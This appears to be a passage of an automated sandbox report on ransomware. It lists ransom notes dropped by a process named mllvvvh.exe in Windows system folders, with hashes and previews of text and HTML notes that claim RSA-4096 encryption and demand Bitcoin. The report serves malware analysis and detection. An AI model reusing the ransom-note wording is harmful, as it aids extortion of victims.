                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
